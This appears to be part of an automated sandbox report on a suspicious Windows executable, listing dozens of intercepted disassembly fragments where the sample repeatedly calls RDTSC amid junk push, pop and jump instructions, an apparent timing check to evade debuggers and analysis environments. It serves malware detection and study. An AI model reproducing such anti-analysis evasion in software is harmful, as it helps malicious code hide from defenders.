Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15E78C0 second address: 143F9D3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC7C1180B36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jns 00007FC7C1180B39h 0x00000013 push dword ptr [ebp+122D1189h] 0x00000019 mov edx, 3630E200h 0x0000001e call dword ptr [ebp+122D1B8Ah] 0x00000024 pushad 0x00000025 pushad 0x00000026 mov dword ptr [ebp+122D186Bh], esi 0x0000002c popad 0x0000002d xor eax, eax 0x0000002f mov dword ptr [ebp+122D186Bh], ebx 0x00000035 mov edx, dword ptr [esp+28h] 0x00000039 pushad 0x0000003a adc di, 42C1h 0x0000003f jmp 00007FC7C1180B49h 0x00000044 popad 0x00000045 mov dword ptr [ebp+122D3739h], eax 0x0000004b pushad 0x0000004c mov dword ptr [ebp+122D1BB1h], edi 0x00000052 mov dword ptr [ebp+122D186Bh], esi 0x00000058 popad 0x00000059 mov esi, 0000003Ch 0x0000005e mov dword ptr [ebp+122D1AD2h], eax 0x00000064 add esi, dword ptr [esp+24h] 0x00000068 pushad 0x00000069 mov edx, edi 0x0000006b push ebx 0x0000006c pushad 0x0000006d popad 0x0000006e pop edx 0x0000006f popad 0x00000070 lodsw 0x00000072 cmc 0x00000073 add eax, dword ptr [esp+24h] 0x00000077 xor dword ptr [ebp+122D186Bh], esi 0x0000007d mov ebx, dword ptr [esp+24h] 0x00000081 xor dword ptr [ebp+122D1BB1h], ebx 0x00000087 mov dword ptr [ebp+122D182Dh], edx 0x0000008d push eax 0x0000008e pushad 0x0000008f push eax 0x00000090 push edx 0x00000091 jmp 00007FC7C1180B3Bh 0x00000096 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15E7C0D second address: 15E7C1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C0FA673Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15E7C1E second address: 15E7C35 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC7C1180B36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d je 00007FC7C1180B52h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15E7C35 second address: 15E7C39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15E8005 second address: 15E801F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jc 00007FC7C1180B36h 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 je 00007FC7C1180B36h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15E801F second address: 15E8031 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC7C0FA6736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FC7C0FA6736h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15E8031 second address: 15E8035 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 160F391 second address: 160F395 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 160F63C second address: 160F640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 160F7B6 second address: 160F7BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 160F7BC second address: 160F7C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 160F7C0 second address: 160F7C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 160FBAF second address: 160FBD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007FC7C1180B36h 0x0000000c popad 0x0000000d jnp 00007FC7C1180B38h 0x00000013 pushad 0x00000014 jmp 00007FC7C1180B3Fh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1613DD0 second address: 1613DD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1613DD4 second address: 1613DDE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC7C1180B42h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1613DDE second address: 1613DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1613DE4 second address: 1613E16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC7C1180B38h 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e js 00007FC7C1180B58h 0x00000014 js 00007FC7C1180B44h 0x0000001a jmp 00007FC7C1180B3Eh 0x0000001f jg 00007FC7C1180B3Eh 0x00000025 pushad 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1614BE8 second address: 1614BEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1615007 second address: 161500D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 161500D second address: 1615011 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1615011 second address: 161501A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 161501A second address: 1615020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1615020 second address: 1615043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC7C1180B3Ch 0x0000000c jmp 00007FC7C1180B40h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1615043 second address: 1615047 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1615047 second address: 161505E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC7C1180B3Ah 0x0000000b popad 0x0000000c push ecx 0x0000000d push esi 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 161505E second address: 1615069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1615069 second address: 161506D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15A8B01 second address: 15A8B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C0FA6748h 0x00000009 popad 0x0000000a ja 00007FC7C0FA6752h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15A8B48 second address: 15A8B4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15A8B4C second address: 15A8B5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FC7C0FA6742h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15A8B5C second address: 15A8B62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1621CB1 second address: 1621CB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 162069C second address: 16206CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007FC7C1180B36h 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e jmp 00007FC7C1180B3Ch 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 jnp 00007FC7C1180B3Eh 0x0000001c push ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 16206CA second address: 16206D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1620834 second address: 162084B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FC7C1180B3Ah 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 162084B second address: 162086D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 popad 0x00000008 pushad 0x00000009 jmp 00007FC7C0FA6744h 0x0000000e push edi 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 162086D second address: 1620888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FC7C1180B36h 0x0000000d jmp 00007FC7C1180B3Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1620F82 second address: 1620F88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 16210B2 second address: 16210ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FC7C1180B3Fh 0x0000000a pushad 0x0000000b jmp 00007FC7C1180B3Ch 0x00000010 push esi 0x00000011 pop esi 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 jl 00007FC7C1180B38h 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 jng 00007FC7C1180B38h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1621562 second address: 162156B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 162156B second address: 162156F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1621AEB second address: 1621AF0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1621AF0 second address: 1621AF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 16242F0 second address: 1624305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FC7C0FA6736h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jl 00007FC7C0FA6736h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1624305 second address: 162430D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 162430D second address: 1624319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1624319 second address: 162431F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 162431F second address: 1624332 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C0FA673Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15A552D second address: 15A5533 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15A5533 second address: 15A553B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1623EB5 second address: 1623EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1623EBD second address: 1623ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC7C0FA6736h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1624027 second address: 1624038 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC7C1180B36h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1624038 second address: 162404F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007FC7C0FA6736h 0x00000011 jl 00007FC7C0FA6736h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 162404F second address: 1624053 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1624053 second address: 162405C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 16269D4 second address: 1626A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C1180B43h 0x00000009 jng 00007FC7C1180B36h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC7C1180B40h 0x00000019 jo 00007FC7C1180B36h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1626A0C second address: 1626A14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1626A14 second address: 1626A26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C1180B3Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1626A26 second address: 1626A2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1626A2A second address: 1626A36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1626A36 second address: 1626A45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C0FA673Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1626BAF second address: 1626BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C1180B3Bh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1626BBF second address: 1626BDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C0FA673Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC7C0FA673Ch 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1626D5B second address: 1626D5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1626D5F second address: 1626D7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C0FA673Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1626D7C second address: 1626D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1626D80 second address: 1626D8A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC7C0FA6736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1626D8A second address: 1626DA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FC7C1180B36h 0x0000000a jmp 00007FC7C1180B44h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1626DA8 second address: 1626DAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 162AFF7 second address: 162B001 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC7C1180B36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 162B001 second address: 162B007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 162B007 second address: 162B011 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC7C1180B3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 162B172 second address: 162B178 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 162B178 second address: 162B18C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C1180B40h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 162B18C second address: 162B1A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C0FA6742h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 162B1A6 second address: 162B1C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC7C1180B48h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 162B360 second address: 162B364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 162B364 second address: 162B368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 162B4BA second address: 162B4E1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC7C0FA673Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC7C0FA6742h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 162B66D second address: 162B672 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 162B672 second address: 162B68D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FC7C0FA6740h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 162B68D second address: 162B69F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 jg 00007FC7C1180B36h 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 162B69F second address: 162B6A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1632549 second address: 163255D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC7C1180B36h 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007FC7C1180B36h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 163255D second address: 1632561 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1632561 second address: 1632567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 163101B second address: 1631039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FC7C0FA6743h 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1631039 second address: 163104F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C1180B42h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 163104F second address: 1631053 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
